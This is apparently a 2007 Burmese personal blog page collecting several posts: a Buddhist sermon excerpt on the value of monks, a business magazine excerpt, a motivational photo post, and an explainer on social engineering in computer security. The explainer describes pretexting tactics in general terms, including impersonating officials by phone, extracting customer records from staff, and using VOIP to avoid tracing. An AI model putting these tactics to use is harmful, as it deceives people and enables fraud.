ကၽြန္ေတာ္ခ်စ္ေသာသူငယ္ခ်င္းမ်ားအတြက္
...: ပညာေရး၊စီးပြားေရး၊ ဘာသာေရး၊ ဂီတ၊ ရုပ္ရွင္၊ စာေပ၊ နည္းပညာ၊ အိုင္တီ၊ ကူးယူရန္ေဆာ႔ဖ္၀ဲလ္မ်ားနဲ႕ အျခားေနရာမ်ားကို ဒီေနရာေလးကေန ေ၀မွ်ေပးလိုက္ပါတယ္ :...

... BE PEACEFUL AND HAPPY ALL THE MOMENTS, ALL MY FRIENDS ...

Jul 28, 2007

ရဟန္းတစ္ပါး၏ တန္ဘိုး


ဒီေန႕ ၀ါဆိုလျပည့္ေန႕ ျဖစ္ပါတယ္ ...
လျပည့္ေန႕ ဆိုေတာ့ ဗုဒၶဘာသာတို႕ အေနနဲ႕ တရား ဘာ၀နာ ေဆာက္တည္၊ အားထုတ္၊ ပြားမ်ားျခင္း အလုပ္ကို ခါတိုင္းထက္ ပိုလုပ္ျဖစ္ေလ့ ရွိၾကပါတယ္...
သူငယ္ခ်င္းေတြ အတြက္ နာၾကားျဖစ္တဲ့ တရားေတာ္ တစ္ပုဒ္ကို ေ၀မွ်ေပးလိုက္ပါတယ္ ...
သီတဂူဆရာေတာ္ အရွင္ဥာဏိႆရ” ေဟာၾကားေတာ္မူတဲ့ “ရဟန္းတစ္ပါး၏ တန္ဘိုး” တရားေတာ္ပါ...
အေၾကာင္းအရာ အခ်ဳိ႕ကို ထုတ္ႏႈတ္ ေဖာ္ျပထားတာ ျဖစ္ပါတယ္ ...
ေအာက္ဘက္မွာ တရားေတာ္ ကို ေဒါင္းလုဒ္ ရယူႏိုင္တဲ့ေနရာလည္း ေပးထားပါတယ္...

ျမတ္တာ ယုတ္တာကို ဘာနဲ႕ ခြဲျခား မွာလဲ ...
မ်ဳိးရုိးနဲ႕ ခြဲမွာလား ... အက်င့္ သီလနဲ႕ ခြဲမွာလား ...
အနာဂါမ္လူပုဂၢိဳလ္သည္ ယေန႕မွ ရွင္/ရဟန္း ျဖစ္ေသာ ပုထုဇဥ္ ရွင္/ရဟန္း ကို ရွိခိုးသင့္/မခိုးသင့္ ...

လူ႕အ၀တ္အစားကို မစြန္႕လႊတ္ႏိုင္ေသးဘဲ အိမ္မွာ ေနေသာ ေသာတာပန္၊ အနာဂါမ္ အစရွိေသာ လူပုဂၢိဳလ္မ်ားသည္ ရဟန္းဘ၀၏ ဂုဏ္ကို ေဆာင္ထားေသာ ပုထုဇဥ္ ရွင္/ရဟန္းကို ရွိခိုးရသည္။
ပုထုဇဥ္ ရွင္/ရဟန္း တြင္-
- ရဟန္း ဘ၀၏ ဂုဏ္အရည္အခ်င္း (၂၀) ႏွင့္
- အသြင္ (၂) ပါး ရွိသည္ -
(က) ဦးေခါင္းကို ေျပာင္ေအာင္ တံုး၍ထားျခင္း။ အလွအပ ျပင္ဆင္ခ်ယ္သေနရေသာ ဦးေခါင္းရွိ ဆံပင္မ်ားကို ရိတ္ထားျခင္း။
(ခ) ဖန္ရည္ဆိုးေသာ အ၀တ္ကို ၀တ္ထားျခင္း။ လူတို႕ကဲ့သို႕ ႏူးညံ့ေသာ အ၀တ္ကို မ၀တ္ေတာ့ဘဲ အထိအေတြ႕ ၾကမ္းတမ္းေသာ အ၀တ္ကို ၀တ္ထားျခင္း။

အသြင္ေျပာင္းထားျခင္းေၾကာင့္ လူ႕အသြင္ အျပင္ႏွင့္ တျခားစီ ျဖစ္လာသည္။ အသြင္ႏွစ္ပါး ေျပာင္းလဲသြားလိုက္သည္ႏွင့္ ပူေဇာ္ထိုက္သူ ျဖစ္လာသည္။ ထို႕ေၾကာင့္ အနာဂါမ္ ပုဂၢိဳလ္ ျဖစ္ေနေစကာမူ လူျဖစ္ေနပါက ပုထုဇဥ္ ရဟန္း၏ အသြင္ႏွစ္ပါးကို ၾကည့္ျပီး ရွိခိုးရသည္။
ရွိခိုး ပူေဇာ္ထိုက္ေသာ အသြင္ရွိျခင္းေၾကာင့္ ရွိခိုးရျခင္း ျဖစ္သည္။
ရဟန္း အသြင္သို႕ ေျပာင္းသြားသည့္ သူမ်ားသည္ ဘုရား အလိုက် အသြင္အျပင္တြင္ တည္ေနျပီ ျဖစ္သည္။
ထို႕ေၾကာင့္ ဘုရား၏အလိုက် အျဖစ္တြင္ တည္ေနေသာ ပုဂၢိဳလ္ကို ဘုရား၏အလိုက် အျဖစ္တြင္ မေနႏိုင္ေသာ ပုဂၢိဳလ္မ်ားက ရွိခိုး ထိုက္သည္။

ပုုထုဇဥ္မွ်သာ ျဖစ္ေသာ္လည္း ရဟႏာၱၾကီးမ်ားႏွင့္ အသြင္တူသည့္ အျဖစ္သို႕ ေရာက္ေနျပီျဖစ္၍ ရွိခိုးထိုက္သည္။

ရဟန္း ဘ၀၏ ဂုဏ္အရည္အခ်င္းမ်ား

ပုုထုဇဥ္မွ်သာ ျဖစ္ေသာ္လည္း ရဟႏာၱၾကီးမ်ားႏွင့္ အတူ ရဟန္းထု အစည္းအေ၀းသို႕ ၀င္ေရာက္ခြင့္ ရွိသည္။ ထို႕ေၾကာင့္ ၀င္ေရာက္ခြင့္ မရွိသည့္ အရိယာ ပုဂၢိဳလ္လူက ပုထုဇဥ္ရဟန္းကို ရွိခိုးထိုက္သည္။

အိမ္မွာေနေသာ လူမ်ားသည္ အမ်ားဆံုး (၈)ပါးသီလသာ ေဆာက္တည္ႏိုင္သည္။ ရွင္ရဟန္း ၏ သီလမွာ အက်ဥ္း(၂၂၇)သြယ္ ၊ အက်ယ္ ကုေဋ (၉၀၀၀)ေက်ာ္ ရွိသည္။ သီလနည္းေသာ အရိယာ ပုဂၢိဳလ္လူမ်ားျဖစ္၍ သီလ မ်ားေသာ ပုထုဇဥ္ရဟန္းမ်ားကို ရွိခိုးထိုက္သည္။

ရွင္ျပဳေပးျခင္း၊ ရဟန္းခံေပးျခင္း၊ သိမ္သမုတ္ေပးျခင္းတို႕မွာ ဘုရားသာသနာကို တိုးခ်ဲ႕ ျခင္း ျဖစ္သည္။
ရဟန္းတစ္ပါးတည္းမွ သာမေဏေလာင္းေပါင္း ေျမာက္မ်ားစြာကို ရွင္သာမေဏ အျဖစ္ ျပဳေပး၊ေဆာင္ရြက္ေပး ႏိုင္သည္။
ပုထုဇဥ္ ရဟန္း (၄)ပါး ေပါင္းျပီး သိမ္ထဲတြင္ ရွင္သာမေဏအျဖစ္မွ ရဟန္းျပဳေပးျခင့္ ဘုရားသာသနာေတာ္ကို တိုးခ်ဲ႕ ေစႏိုင္ေသာ အရည္အခ်င္းရွိသည္။
ရဟန္းမ်ား စုေပါင္းျပီး သိမ္သမုတ္ေပးႏိုင္သည္။
လူ၀တ္ေၾကာင္မ်ားက ထိုအလုပ္မ်ားကို မလုပ္ႏိုင္...
ဘုရားသာသနာေတာ္ကို တိုးခ်ဲ႕ေတာ္မူေသာ ပုဂၢိဳလ္မ်ားကို ဘုရားသာသနာေတာ္ကို က်ယ္ျပန္႕ေအာင္ မလုပ္ႏိုင္ေသာ ပုဂၢိဳလ္မ်ားက ရွိခိုးထိုက္သည္။

ရဟန္းသည္ မိမိတတ္ထားေသာ ပိဋကတ္ေတာ္မ်ားကို အဆက္ဆက္ သင္ေပးႏိုင္စြမ္းရွိသည္။ သာသနာ့ အဆက္အႏြယ္ကို သယ္ေဆာင္ႏိုင္စြမ္း ရွိသည္။ ငယ္စဥ္ အိမ္ေရွ႕မင္းသားဘ၀က မိမိကို ပညာသင္ေပးခဲ့သည့္ ဆရာျဖစ္သူကို ရွင္ဘုရင္ ျဖစ္လာေသာအခါတြင္လည္း ရွိခိုးရသကဲ့သို႕
အနာဂါမ္လူသားသည္ မိမိကို အနာဂါမ္ျဖစ္ေအာင္ တရားျပ လမ္းညႊန္ေပးေသာ ပုထုဇဥ္ ရွင္ရဟန္းကို ရွိခိုးရသည္။

ရဟႏာၱ ရွင္ရဟန္းသည္ ရဟန္းဘ၀ျဖင့္ သာသနာ့ေဘာင္တြင္ အသက္ရွည္ရွည္ ေနထိုင္ႏိုင္သည္။
လူ၀တ္ေၾကာင္သည္ အိမ္မွာ တရားက်င့္ရင္း ရဟႏာၱ ျဖစ္သြားပါက ျဖစ္ေသာေန႕တြင္ပင္ ရဟန္းေဘာင္သို႕ ေျပာင္းႏိုင္ကေျပာင္း၊ မေျပာင္းႏိုင္က ထိုေန႕တြင္ပင္ ပရိနိဗၺာန္ ျပဳရသည္။

ရဟန္းဘ၀ ရရွိျခင္း၏ ထူးျခား ေလးနက္ မြန္ျမတ္ေသာ အက်ဳိးတရားမ်ား ကို ေကာင္းစြာ သိရွိနားလည္ ထားျခင္းျဖင့္ သာသနာေတာ္ႏွင့္ ရဟန္းေတာ္မ်ားကို ပိုမိုေကာင္းမြန္ ရိုေသစြာ ေစာင့္ေရွာက္၊ ၾကည္ညိဳ ႏိုင္မည္ ျဖစ္ေပသည္။

-ရဟန္း တစ္ပါး၏ တန္ဘိုး တရားေတာ္ - ရယူရန္

သူငယ္ခ်င္းမ်ား အားလံုး ယခုထက္ပို၍ အမ်ဳိး၊ ဘာသာ၊ သာသနာေတာ္ အက်ဳိးကို ဆထက္ ထမ္းပိုး တိုးတက္ သယ္ပိုးႏိုင္သူမ်ား ျဖစ္ႏိုင္ၾကပါေစဗ်ာ ...

Jul 27, 2007

အရႈံးမွသည္ ေအာင္ပြဲဆီသို႕- (CEO မဂၢဇင္း)


တူေဒးမီဒီယာ အုပ္စု ကေန ထုတ္ေ၀တဲ့ စီအီးအိုမဂၢဇင္း ထဲက ေဆာင္းပါးတစ္ပုဒ္ပါ .....
ဒီမဂၢဇင္းက တစ္လ တစ္ ၾကိမ္ထုတ္ေ၀တာ ျဖစ္ျပီး အြန္လိုင္းကေန ဖတ္လို႕ ရပါတယ္ ...
သံုးထားတဲ့ စာလံုးက “ ျမေစတီ” ပါ။ အဲဒီမွာပဲ အလြယ္တကူ ေဒါင္းလုဒ္ ခ်လို႕ ရပါတယ္ ...
ႏွစ္သက္မိတဲ့ ေဆာင္းပါးေလး တစ္ပုဒ္ကို အျမည္း ေဖာ္ျပေပးလိုက္ပါတယ္..
အျပည့္ အစံုဖတ္ခ်င္ရင္ေတာ့ မူရင္း ေနရာမွာ သြားဖတ္ဖို႕ အတြက္ “ လမ္းေၾကာင္း ” ေအာက္ဖက္မွာ ေပးထားပါတယ္ ...

အခန္း (၁)

သာမန္ ရြက္ၾကမ္းေရက်ဳိပုဂၢိဳလ္ေတြနဲ႕ ထူးထူးခၽြန္ခၽြန္ ေဆာင္ရြက္တတ္သူေတြရဲ႕ အဓိက ျခားနားခ်က္ေတြက ဘာလဲ။

ဘယ္လိုပဲျဖစ္ၿဖစ္ က်ဳပ္တုိ႕အားလုံးဟာ အရႈံးသမားေတြပါပဲ။ အထူးသျဖင့္ က်ဳပ္တို႕အထဲက အေတာ္ဆုံး ဆိုတဲ့လူေတြေပါ့့ဗ်ာ။

ေဂ်အမ္ဘားရီး

ထူးထူးခၽြန္ခၽြန္ စြမ္းေဆာင္ႏိုင္သူေတြဟာ အဲဒီလိုအေျခအေနမ်ဳိး ျဖစ္လာဖို႕ ဘယ္လိုအရာ ေတြဟာ ဖန္တီးေပးသလဲ။ အခ်ဳိ႕လူေတြက ဒုံးပ်ံတစ္ခုလို ေကာင္းကင္ကို ထိုးတက္ သြားခ်ိန္မွာ၊ တခ်ဳိ႕လူေတြက ဘာေၾကာင့္ေျမၾကီးေပၚကို ေဇာက္ထုိးက်ရတာလဲ။ ဒီလို ေအာင္ၿမင္မႈ ေတြရတာေတြဟာ ကံေကာင္းလို႕၊ နတ္ေဒ၀တာေတြ ေစာင္မလို႕၊ ဒါမွမဟုတ္ ထိကိုင္သမွ်ေရ ျဖစ္ေစ ဆိုတဲ့ (လက္ဖ်ား ေငြသီးေအာင္ လုပ္ႏိုင္တဲ့) အရည္အေသြးမ်ဳိး ရွိလို႕ စသည္ျဖင့္ ကိုယ္ၾကိဳက္သလို ေျပာႏိုင္ပါတယ္္။ ဒါေပမဲ့ အမွန္အတိုင္းေျပာရရင္ တခ်ဳိ႕ လူေတြဟာ အင္မတန္ၾကီးမားတဲ့အခက္အခဲေတြၾကားထဲမွွာ မယုံၾကည္ႏိုင္ေလာက္တဲ့ ေအာင္ၿမင္မႈေတြရေအာင္ ေဆာင္ရြက္ ႏိုင္ၾကတဲ့ စြမ္းရည္ ရွိတယ္ဆိုတာ ေတြ႕ရပါတယ္။

......................

ဘယ္အရာဟာ ေအာင္ျမင္မႈရဲ႕အေျခခံလဲ။
ေအာင္ျမင္သူေတြနဲ႕ မေအာင္ျမင္သူေတြရဲ႕ၾကားက ကြာျခားခ်က္က ဘာလဲ။ တခ်ဳိ႕ပုုဂၢဳိလ္ေတြက အလြန္႕အလြန္ေအာင္ျမင္ျပီး တခ်ဳိ႕ ပုဂၢိဳလ္ေတြ က်ေတာ့ အရံႈးေတြနဲ႕ခ်ည္း ရင္ဆုိင္ေနရတာ ဘာေၾကာင့္လဲ။


အျပည့္အစံုဆက္ဖတ္ခ်င္တယ္ဆိုရင္ေတာ့ မူရင္းေနရာ ကို “ ဒီကေန” သြားလို႕ ရပါတယ္ .....

Jul 26, 2007

လူမႈအင္ဂ်င္နီယာ - Social Engineering


နာမည္ေလးကေတာ့ အမိုက္စား၊ အပ်ံစား။ တကယ္ေလ့လာ ၾကည့္လိုက္ေတာ့ ကြန္ပ်ဳတာစနစ္ လံုျခံဳေရးနယ္ပယ္တြင္ လူေတြကို နည္းမ်ဳိးစံုႏွင့္ ယံုၾကည္လာေအာင္ ဖန္တီး လွည့္စားျပီး အေရးၾကီးေသာ အခ်က္အလက္မ်ားကို မိမိအတြက္ အျမတ္ထုတ္ ႏိုင္ေစရန္ အၾကံအဖန္လုပ္သည့္ နည္စနစ္မ်ားကို ေပါင္းစပ္ ေခၚထားသည့္ အမည္ ျဖစ္ေနသည္။
ဤအမည္ကို ႏိုင္ငံေရး သိပၸံ (political science) နယ္ပယ္တြင္လည္း ခပ္ဆင္ဆင္ အသံုးျပဳၾကသည္။ လိမ္တာေတာ့ မဟုတ္။ အယူ၀ါဒေရးရာ ပိုင္းအရ လူအမ်ားအေပၚ လႊမ္းမိုးမႈရေအာင္ ၾကိဳးစားေသာ ဘာသာရပ္ တစ္ခု ျဖစ္သည္။ Political engineering ဟုလည္းေခၚသည္။ အေသးစိပ္ သိလိုလွ်င္ေတာ့ျဖင့္ -http://en.wikipedia.org/wiki/Social_engineering_%28political_science%29- တြင္ ေလ့လာႏိုင္ပါသည္။

ကြန္ပ်ဳတာ စနစ္လံုျခံဳေရးနယ္ပယ္တြင္ “လူမႈအင္ဂ်င္နီယာ” အလုပ္မ်ားက သာမန္လိမ္လည္ လွည့္ျဖားျခင္းမ်ဳိး (Frud) ထက္ အဆင့္ အတန္းျမင့္ သကဲ့သို႕၊ အယံုသြင္းျပီးတပတ္ရုိက္ျခင္း (Confidence trick) ႏွင့္လည္း အနည္းငယ္ ျခားနားသည္။ တစ္ဖက္သားကို အယံုသြင္း ရသည့္ ေနရာတြင္ေတာ့ သံုးမ်ဳိးလံုး အေတာ္မ်ားမ်ားတူညီမႈ ရွိသည္။ သို႕ေသာ္ လူမႈအင္ဂ်င္နီယာ တစ္ေယာက္က သားေကာင္ ထံမွ သတင္း အခ်က္အလက္မ်ား ကိုရရွိေစရန္ သို႕မဟုတ္ သားေကာင္၏ ကြန္ပ်ဳတာ စနစ္ကို ထိေတြ႕ အသံုးျပဳခြင့္ရေစရန္ အတြက္ အဓိက အားထုတ္ၾကိဳးပမ္း ေလ့ရွိျပီး “သားေကာင္”ႏွင့္ မည္သည့္အခါတြင္မဆို မ်က္ႏွာျခင္းဆိုင္ေတြ႕ျခင္း၊ လူခ်င္းေတြ႕ျခင္း မရွိေပ။

နည္းစနစ္မ်ား ႏွင့္ အေခၚအေ၀ၚမ်ား
“လူမႈအင္ဂ်င္နီယာ နည္းစနစ္မ်ား” အားလံုးသည္ လူသားတို႕၏ ေတြးေတာဆင္ျခင္မႈ အပိုင္းမွ အားနည္းခ်က္မ်ား ျဖစ္ေသာ ဘက္လိုက္မႈမ်ား၊ အစြဲမ်ား (Cognitive biases) - အေပၚတြင္ အေျခခံ ထားသည္။ အဆိုပါ ဘက္လိုက္တတ္ေသာ အားနည္းခ်က္မ်ားမွာ အဓိက အားျဖင့္ အုပ္စု (၃) စု ရွိသည္။

  • ဆံုးျဖတ္ခ်က္ ခ်ျခင္း ႏွင့္ အျပဳအမူဆိုင္ရာ ဘက္လိုက္ျခင္းမ်ား
    • ၃၀ ခု ရွိပါသည္။
    • ဥပမာ - Bandwagon effect - အျခားေသာသူမ်ား အားလံုးက လုပ္ေနေသာ (သို႕မဟုတ္ ယံုၾကည္ေနေသာ) အရာျဖစ္၍ လိုက္လုပ္ျခင္း။
  • ျဖစ္ႏိုင္ေခ် ႏွင့္ ယံုၾကည္မႈ ဆိုင္ရာ ဘက္လိုက္ျခင္းမ်ား
    • ၂၂ ခု ရွိပါသည္။
    • ဥပမာ - Positive outcome bias - ျဖစ္လာေသာ အေၾကာင္းအရာမ်ားအေပၚ အေကာင္းမ်ားခ်ည္း ျဖစ္လာမည္ဟု လိုသည္ထက္ ပို၍ ခန္႕မွန္းျခင္း။
  • လူမႈ ဆိုင္ရာ ဘက္လိုက္ျခင္းမ်ား
    • ၁၉ ခု ရွိပါသည္။
    • ဥပမာ - False consensus effect - အမ်ားက လက္ခံသတ္မွတ္ထားသည့္ အေျခအေနထက္ လူတစ္ဦး (သို႕) အမ်ားကို ပို၍ ခန္႕မွန္းျခင္း။
လူမႈအင္ဂ်င္နီယာမ်ားသည္ အထက္တြင္ ေဖာ္ျပထားခဲ့သည့္ ဘက္လိုက္တတ္ေသာ ခၽြတ္ယြင္းခ်က္မ်ားကို နည္းအမ်ဳိးမ်ဳိးျဖင့္ ေပါင္းစပ္ အသံုးခ်ကာ တိုက္ခိုက္မႈနည္းစနစ္မ်ားကို ေဖာ္ေဆာင္ၾကေလ့ရွိသည္။ ၄င္းတို႕အနက္မွ အခ်ဳိ႕ကို ေအာက္တြင္ ေဖာ္ျပထားပါသည္။

၁. ယိုးမယ္ဖြဲ႕ လွည့္စားျခင္း (Pretexting)
ဤနည္းစနစ္မွာ ၾကိဳတင္ တီထြင္ လုပ္ၾကံဖန္တီး ထားေသာ အေၾကာင္းအရာ တစ္ခုကို အသံုးျပဳလ်က္ ပစ္မွတ္ထားေသာ “ သားေကာင္” ထံမွ
- လိုခ်င္ေသာ အခ်က္အလက္မ်ား ေပၚထြက္လာေအာင္ သို႕မဟုတ္
- တစ္ခုခု ေဆာင္ရြက္လာေအာင္ လွည့္ဖ်ား ေသြးေဆာင္သည့္ ေဆာင္ရြက္ခ်က္ ျဖစ္သည္။
အမ်ားအားျဖင့္ တယ္လီဖုန္းျဖင့္ လုပ္ေဆာင္တတ္ၾကသည္။ သာမန္ ရိုးစင္းေသာ လိမ္လည္မႈမ်ဳိး မဟုတ္ဘဲ
- ၾကိဳတင္ ေလ့လာ စံုစမ္းထားေသာ အခ်က္အလက္မ်ား၊
- အကြက္ခ် စီစဥ္ထားေသာ လုပ္ကြက္မ်ား ႏွင့္
- ေမြးေန႕၊ ႏိုင္ငံသားအမွတ္ ၊ ေနာက္ဆံုးေပးေခ်လိုက္ေသာ ေငြစာရင္း စသည့္ အရာတစ္ခုခုကို သိေအာင္ ျပဳလုပ္ကာ
- အဆိုပါ အခ်က္အလက္မ်ား ႏွင့္ ပတ္သက္၍ တာ၀န္ရွိသူတစ္ဦး အျဖစ္ “သားေကာင္” ကို အယံုသြင္း လွည့္စားျခင္း ျဖစ္သည္။

စီးပြားေရးလုပ္ငန္း တစ္ခုခုထံမွ ေဖာက္သည္မ်ားႏွင့္ သက္ဆိုင္ေသာ အခ်က္အလက္မ်ား ဖြင့္ေျပာလာေအာင္ လွည့္စားလိုသည့္ အခါမ်ားတြင္ ဤနည္းစနစ္ကို မၾကာခဏ သံုးေလ့ရွိၾကသည္။ အလြတ္စံုေထာက္မ်ား အေနျဖင့္ တယ္လီဖုန္း မွတ္တမ္းမ်ား၊ ၀န္ေဆာင္မႈ မွတ္တမ္းမ်ား၊ ဘဏ္စာရင္းမ်ား ႏွင့္ အျခားေသာ အခ်က္အလက္မ်ားကို အငယ္တန္း ကုမၸဏီ ၀န္ထမ္းမ်ား ထံမွ တိုက္ရိုက္ ႏိႈက္ထုတ္ လိုသည့္အခါတြင္လည္း ဤနည္းစနစ္ကို သံုးၾကသည္။ ထို႕ေနာက္ ရလာေသာ အခ်က္အလက္မ်ားကို အေျခခံလ်က္ ပိုမို အဆင့္ျမင့္ တာ၀န္ရွိေသာသူမ်ား (ဥပမာ - မန္ေနဂ်ာ) ထံ ခ်ဥ္းကပ္ကာ မိမိတို႕ အေနျဖင့္ ၄င္းအခ်က္အလက္မ်ား၏ ပိုင္ရွင္ အမွန္ျဖစ္ေၾကာင္း ထင္ျမင္လာေစရန္ အယံုသြင္းျခင္း (ေငြစာရင္း အမွတ္မ်ား ေျပာင္းလဲျခင္း၊ တိက်ေသာ စာရင္း အမွန္မ်ား ေတာင္းယူျခင္း) မ်ား လုပ္ေဆာင္ တတ္ၾကသည္။

အေမရိကားရွိ ကုမၸဏီအမ်ားစုသည္ ေဖာက္သည္ တစ္ဦးကို မွန္/မမွန္ စစ္ေဆးလိုသည့္ အခါ ၄င္း၏ ႏိုင္ငံသား စိစစ္ေရးအမွတ္ (Social Security Number)၊ ေမြးေန႕ စသည့္ အရာတစ္ခုႏွစ္ခုကိုမွ်သာ ေမးျပီး အတည္ျပဳေလ့ ရွိၾကသည္။ အမွန္တကယ္အားျဖင့္ အဆိုပါ အခ်က္အလက္မ်ားကို အမ်ားျပည္သူဆိုင္ရာ မွတ္တမ္းမ်ား (ကိုယ္ခႏၶာဆိုင္ရာ မွတ္တမ္းမ်ား၊ လူ၀င္မႈဆိုင္ရာ မွတ္တမ္းမ်ား၊ အိမ္ျခံေျမ မွတ္တမ္းမ်ား၊ ယာဥ္ေမာင္းႏွင္မႈ မွတ္တမ္းမ်ား၊ ရာဇ၀တ္မႈ မွတ္တမ္းမ်ား - စသည္) ကို အင္တာနက္မွ အလြယ္တကူ ရယူႏိုင္ေပသည္။ ဤစစ္ေဆးနည္းမွာ အလြန္ပင္ ထိေရာက္မႈ ရွိျပီး ေနာက္ထပ္ ပိုမို ေကာင္းမြန္ေသာ စစ္ေဆးေရးနည္းလမ္း တစ္ခုကို မေတြ႕မခ်င္း အသံုး၀င္ေနမည္သာ ျဖစ္သည္။

ယိုးမယ္ဖြဲ႕ လွည့္စားျခင္းနည္းမ်ား ကို
  • အစုအစပ္ လုပ္ငန္းမ်ား၊ ရဲမ်ား၊ ဘဏ္မ်ား၊ အေကာက္ခြန္ ႏွင့္ အာမခံလုပ္ငန္းမ်ားမွ တာ၀န္ရွိသူမ်ား - သို႕မဟုတ္
  • အျခားတာ၀န္ရွိေသာ တစ္ဦး တစ္ေယာက္မဆို သို႕မဟုတ္
  • ပစ္မွတ္ထားသည့္ အေၾကာင္းအရာ ႏွင့္သက္ဆိုင္သည့္ အေျဖ တစ္ခုခုရရွိႏိုင္သူ တစ္ဦးကို
  • တယ္လီဖုန္းမွတဆင့္ (လူခ်င္းမေတြ႕ရဘဲ) အေယာင္ေဆာင္ အယံုသြင္းလိုသည့္ အခါ အမ်ားဆံုး အသံုးျပဳၾကသည္။
  • လွည့္စားသူ အေနျဖင့္ “ပစ္မွတ္” မွ ေမးလာႏိုင္ေသာ အေၾကာင္းအရာမ်ား၊ ေမးခြန္းမ်ား အတြက္ အေျဖမ်ားကို ၾကိဳတင္ ျပင္ဆင္ ထားလိုက္ရံုသာ ျဖစ္သည္။
  • အခ်ဳိ႕ျဖစ္ရပ္မ်ားတြင္ ဆိုလွ်င္
    • ေယာက်ၤား/မိန္းမ အသံ အမွန္အတိုင္း ျဖစ္ရံု၊
    • အရိုးသားဆံုး ေလသံ အေနအထား ႏွင့္
    • ေျခေထာက္ဖက္ ေတာင္းပန္ေတာ့မတတ္ အေျပာအဆို မွ်ေလာက္ႏွင့္ အလုပ္ ျဖစ္သြားတတ္ၾကေလသည္။
ခုေနာက္ပိုင္းတြင္ VOIP ပရိုဂရမ္မ်ားမွာ လွည့္စားသူမ်ား၏ စံထား အသံုးျပဳေသာ အရာတစ္ခု ျဖစ္လာသည္။ ေျခရာခံႏိုင္ေလာက္သည့္ ဂဏန္းမ်ား၊ နံပါတ္မ်ား က်န္ေနရစ္ခဲ့ျခင္း မရွိမႈသည္လည္း အခ်က္တစ္ခု ျဖစ္လာသည္။

ဆက္လက္ ေဖာ္ျပပါမည္ ....

ရည္ညြန္း -
-http://en.wikipedia.org/wiki/Social_engineering_%28security%29
-http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci531120,00.html
-http://www.securityfocus.com/infocus/1527
-http://en.wikipedia.org/wiki/List_of_cognitive_biases

Jul 24, 2007

ရွင္သန္ ေနထိုင္ျခင္း Living


မေန႕က သူငယ္ခ်င္းတစ္ေယာက္ရဲ႕ အီးေမးလ္ ၀င္လာလို႕ ဖတ္ၾကည့္လိုက္ေတာ့ ျမင္ေတြ႕ရတဲ့ အေၾကာင္းအရာေတြကို ေရာင္းရင္း ေတြကိုလည္း မွ်ေပးခ်င္လာတဲ့အတြက္ တဆင့္ျပန္ျပီး ေဖာ္ျပေပးလိုက္ပါတယ္ ....
ကၽြန္ေတာ္တို႕ ဘ၀ေတြမွာ တခါတရံ စိတ္ညစ္စရာ မ်ဳိးစံုနဲ႕ ရင္္ဆိုင္ ၾကံဳေတြ႕ၾကရတဲ့ အခါ ခံစားခ်က္ အမ်ဳိးမ်ဳိးျဖစ္ေပၚလာ တတ္ၾကတာ အမွန္ပါပဲ .... ဒါေပမယ့္ အခုျမင္ရတဲ့ လူေတြေလာက္ေတာ့ မဆိုးေသးဘူးလို႕ ထင္ပါတယ္ ...




စိတ္မေပ်ာ္ မရႊင္ ျဖစ္ေနသလား ... ဒီလိုလူေတြအတြက္ ခ်န္ထားပါဦး .... သူတို႕ေတြ ေလာက္ေတာ့ ကၽြန္ေတာ္တို႕ အျဖစ္ မဆိုးေသးပါဘူး




ကို္ယ္လုပ္ေနရတဲ့ လက္ရွိ အလုပ္က ဘယ္လိုပဲျဖစ္ေနေန ဒီကေလးေလာက္ေတာ့ ဆိုးမယ္ မထင္ပါဘူးေနာ္ ... ၾကည့္ၾကပါဦး ဗ်ာ



ကိုယ္ရတဲ့လစာေရာ အေတာ္ေလး မေၾကမနပ္ ျဖစ္စရာ ေကာင္းေနတယ္၊ နည္းပါးလြန္းေနတယ္၊ လုပ္ရတာနဲ႕
ရေနတာနဲ႕ မတန္လိုက္တာ ဆိုတဲ့ အေတြးေလးေတြ ေပၚလာခဲ့ရင္ ... ဒီထက္ပိုရမယ့္ ေနရာကို ေျပာင္းႏိုင္ေအာင္ ၾကိဳးစားတာ ေကာင္းတဲ့ အေျပာင္း အလဲပါပဲ ....



ကိုယ့္ေဘးမွာ အေပါင္းအသင္း ေရာင္းရင္းေတြ ဘယ္ေလာက္ပဲ မ်ားေနပါေစ ... အေရးၾကံဳရင္ ကိုယ့္အေပၚ ကူညီတတ္တဲ့သူငယ္ခ်င္းမ်ဳိးကိုေတာ့ ကၽြန္ေတာ္တို႕ ေရာင္းရင္းတို႕ရဲ႕ ဘ၀မွာ အမွန္တကယ္ အေရးတၾကီး လိုအပ္လွပါတယ္ ....



စာေတြသင္ေနရတာ ပညာေတြေလ့လာ ဆည္းပူးေနရတာ အရမ္းကို ၀န္ထုတ္၀န္ပိုးတစ္ခုလို ျဖစ္ေနျပီလား ... သူေလးကေတာ့ အားၾကိဳးမာန္တက္ ေလ့လာေနရွာေလရဲ႕







ဒီလို အျဖစ္မ်ဳိးေတာ့ ဘယ္သူမွ လိုခ်င္မွာ မဟုတ္တာ ေသခ်ာပါတယ္ ...



ဒါေရာ
ဘယ္လိုသေဘာမ်ဳိးရပါသလဲ



ဒီလို သြားေရးလာေရး အလြန္ခက္ခဲတဲ့ ေနရာေတြမွာ ေနထိုင္ေန ရတဲ့ လူေတြရွိေနေသးတယ္ ဆိုတာ သိထားရင္ တခါတရံ ၾကံဳေတြ႕ရတဲ့ ခရီးလမ္းပမ္း အဆင္ မေျပတာေလးေတြကို အထိုက္အေလ်ာက္ သီးခံ ႏိုင္မွာပါ .....

လူ႕အဖြဲ႕အစည္းကို မမွ်တဘူးလို႕ ျမင္လာမိတဲ့ အခါမ်ဳိးေတြမွာ ...... . . .

အဆင္မေျပမႈဆိုတာ ဘ၀မွာ မၾကာခဏ ၾကံဳေတြ႕ရတတ္တဲ့ ျဖစ္ေလ့ျဖစ္ထရွိတဲ့ အရာ တစ္ခုပါပဲ ... အဆင္မေျပတာေလးေတြကို ေျပလည္သြားေအာင္ ေျဖရွင္းလိုက္ႏိုင္တဲ့ အခ်ိန္မ်ဳိးမွာ ခံစားရတဲ့ ေပ်ာ္ရႊင္မႈေလးေတြက ပင္ပန္းခဲ့သမွ်ကို တစ္ခါတည္း ေျပေပ်ာက္သြား ေစတာ အမွန္ပါပဲ အဓိက အခ်က္ကေတာ့ ဘာပဲျဖစ္လာျဖစ္လာ တည္တည္ျငိမ္ျငိမ္နဲ႕ ရင္ဆိုင္ေျဖရွင္းသြားဖို႕၊ ေခါင္းေအးေအးထားျပီး နည္းလမ္းရွာဖို႕လို႕ ကၽြန္ေတာ္ကေတာ့ ခံယူမိပါတယ္ ...

Jul 22, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - ကာကြယ္နည္းမ်ား


